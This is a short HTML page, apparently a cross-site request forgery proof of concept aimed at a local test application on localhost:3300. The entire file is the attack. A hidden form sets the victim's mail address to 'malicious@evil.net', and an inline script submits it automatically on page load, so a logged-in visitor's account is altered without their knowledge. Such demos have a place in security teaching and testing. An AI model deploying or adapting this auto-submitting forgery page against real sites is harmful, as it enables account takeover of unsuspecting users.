<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <form action="http://localhost:3300/mail" method="post">
        <input type="hidden" name="mail" value="malicious@evil.net" />
    </form>
    <script>
        document.forms[0].submit();
    </script>
</body>
</html>